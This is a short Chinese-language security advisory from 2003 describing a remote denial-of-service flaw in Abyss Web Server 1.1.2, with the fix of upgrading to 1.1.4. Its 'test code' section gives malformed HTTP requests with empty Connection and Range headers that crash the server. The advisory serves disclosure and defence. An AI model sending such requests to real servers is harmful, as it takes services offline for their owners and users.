Abyss Web Server不完整HTTP请求远程拒绝服务攻击漏洞发布时间:2003-04-18 更新时间:2003-04-18 严重程度:高 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:7287 受影响系统 Aprelium Technologies Abyss Web Server 1.1.2详细描述 Abyss Web Server实现上存在漏洞,当其试图处理某种不完整的HTTP请求时会导致拒绝服务。 测试代码 GET / HTTP/1.0 Connection: GET / HTTP/1.0 Range: 解决方案 Aprelium Technologies Abyss Web Server 1.1.2: Aprelium Technologies Upgrade Abyss Web Server 1.1.4 http://www.aprelium.com/abyssws/download.php 相关信息 Auriemma Luigi <aluigi@pivx.com> Abyss X1 1.1.2 remote crash http://archives.neohapsis.com/archives/bugtraq/2003-04/0095.html |